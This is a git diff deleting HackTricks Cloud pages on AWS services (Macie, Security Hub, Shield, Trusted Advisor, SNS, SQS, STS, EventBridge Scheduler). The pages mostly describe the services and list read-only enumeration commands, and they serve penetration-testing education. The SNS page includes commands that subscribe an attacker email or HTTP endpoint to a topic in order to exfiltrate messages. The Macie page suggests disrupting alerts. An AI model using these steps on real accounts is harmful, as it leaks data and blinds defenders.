-{% endhint %} - -## Macie - -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. - -Key Features of Amazon Macie: - -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. - -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. - -### Alert System - -Macie categorizes alerts into predefined categories like: - -* Anonymized access -* Data compliance -* Credential Loss -* Privilege escalation -* Ransomware -* Suspicious access, etc. - -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. - -### Dashboard Features - -The dashboard categorizes data into various sections, including: - -* S3 Objects (by time range, ACL, PII) -* High-risk CloudTrail events/users -* Activity Locations -* CloudTrail user identity types, and more. 
- -### User Categorization - -Users are classified into tiers based on the risk level of their API calls: - -* **Platinum**: High-risk API calls, often with admin privileges. -* **Gold**: Infrastructure-related API calls. -* **Silver**: Medium-risk API calls. -* **Bronze**: Low-risk API calls. - -### Identity Types - -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. - -### Data Classification - -Data classification encompasses: - -* Content-Type: Based on detected content type. -* File Extension: Based on file extension. -* Theme: Categorized by keywords within files. -* Regex: Categorized based on specific regex patterns. - -The highest risk among these categories determines the file's final risk level. - -### Research and Analysis - -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. 
- -### Enumeration - -``` -# Get buckets -aws macie2 describe-buckets - -# Org config -aws macie2 describe-organization-configuration - -# Get admin account (if any) -aws macie2 get-administrator-account -aws macie2 list-organization-admin-accounts # Run from the management account of the org - -# Get macie account members (run this form the admin account) -aws macie2 list-members - -# Check if automated sensitive data discovey is enabled -aws macie2 get-automated-discovery-configuration - -# Get findings -aws macie2 list-findings -aws macie2 get-findings --finding-ids -aws macie2 list-findings-filters -aws macie2 get -findings-filters --id - -# Get allow lists -aws macie2 list-allow-lists -aws macie2 get-allow-list --id - -# Get different info -aws macie2 list-classification-jobs -aws macie2 list-classification-scopes -aws macie2 list-custom-data-identifiers -``` - -#### Post Exploitation - -{% hint style="success" %} -From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. -{% endhint %} - -TODO: PRs are welcome! - -## References - -* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md deleted file mode 100644 index ec054c188..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Security Hub Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security Hub - -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. - -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts - -**Characteristics** - -* Regional (findings don't cross regions) -* Multi-account support -* Findings from: - * Guard Duty - * Config - * Inspector - * Macie - * third party - * self-generated against CIS standards - -## Enumeration - -``` -# Get basic info -aws securityhub describe-hub - -# Get securityhub org config -aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error - -# Get the configured admin for securityhub -aws securityhub get-administrator-account -aws securityhub get-master-account # Another way -aws securityhub list-organization-admin-accounts # Another way - -# Get enabled standards -aws securityhub get-enabled-standards - -# Get the findings -aws securityhub get-findings - -# Get insights -aws securityhub get-insights - -# Get Automation rules (must be from the admin account) -aws securityhub list-automation-rules - -# Get members (must be from the admin account) -aws securityhub list-members -aws securityhub get-members --account-ids -``` - -## Bypass Detection - -TODO, PRs accepted - -## References - -* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) -* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md deleted file mode 100644 index b6ee0fa3a..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Shield Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. - -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md deleted file mode 100644 index 518251fd6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ /dev/null @@ -1,97 +0,0 @@ -# AWS - Trusted Advisor Enum - -## AWS - Trusted Advisor Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Trusted Advisor Overview - -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: - -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. - -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. - -### Notifications and Data Refresh - -* Trusted Advisor can issue alerts. -* Items can be excluded from its checks. -* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. - -### **Checks Breakdown** - -#### CategoriesCore - -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions - -#### Core Checks - -Limited to users without business or enterprise support plans: - -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. 
Service Limits - -#### Security Checks - -A list of checks primarily focusing on identifying and rectifying security threats: - -* Security group settings for high-risk ports -* Security group unrestricted access -* Open write/list access to S3 buckets -* MFA enabled on root account -* RDS security group permissiveness -* CloudTrail usage -* SPF records for Route 53 MX records -* HTTPS configuration on ELBs -* Security groups for ELBs -* Certificate checks for CloudFront -* IAM access key rotation (90 days) -* Exposure of access keys (e.g., on GitHub) -* Public visibility of EBS or RDS snapshots -* Weak or absent IAM password policies - -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. - -## **References** - -* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md deleted file mode 100644 index 2c3753a36..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ /dev/null @@ -1,106 +0,0 @@ -# AWS - SNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. - -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. - -### **Difference with SQS** - -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. 
- -### **Enumeration** - -```bash -# Get topics & subscriptions -aws sns list-topics -aws sns list-subscriptions -aws sns list-subscriptions-by-topic --topic-arn - -# Check privescs & post-exploitation -aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt - -# Exfiltrate through email -## You will receive an email to confirm the subscription -aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com - -# Exfiltrate through web server -## You will receive an initial request with a URL in the field "SubscribeURL" -## that you need to access to confirm the subscription -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="danger" %} -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). - -Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
-{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %} -[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %} -[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %} -[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sns-persistence.md" %} -[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md deleted file mode 100644 index e4c425669..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - SQS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. - -### Enumeration - -```bash -# Get queues info -aws sqs list-queues -aws sqs get-queue-attributes --queue-url --attribute-names All - -# More about this in privesc & post-exploitation -aws sqs receive-message --queue-url - -aws sqs send-message --queue-url --message-body -``` - -{% hint style="danger" %} -Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
-{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %} -[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %} -[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %} -[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %} -[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md) -{% endcontent-ref %} - -## References - -* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md deleted file mode 100644 index ad755d115..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ /dev/null @@ -1,126 +0,0 @@ -# AWS - STS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). - -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. - -### Assume Role Impersonation - -The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. - -For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. - -#### Assume Role Logic - -In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::role/priv-role" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). 
- -However, if a role is allowing an account to assume it, like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). - -### Enumeration - -```bash -# Get basic info of the creds -aws sts get-caller-identity -aws sts get-access-key-info --access-key-id - -# Get CLI a session token with current creds -## Using CLI creds -## You cannot get session creds using session creds -aws sts get-session-token -## MFA -aws sts get-session-token --serial-number --token-code -``` - -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %} -[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %} -[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-sts-persistence.md" %} -[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md) -{% endcontent-ref %} - -## References - -* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) - -{% 
hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md deleted file mode 100644 index c90be6f1d..000000000 --- a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - EventBridge Scheduler Enum - -## EventBridge Scheduler - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. - -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." - -### Types of Schedules - -Types of Schedules in EventBridge Scheduler: - -1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. - -Two Mechanisms for Handling Failed Events: - -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. 
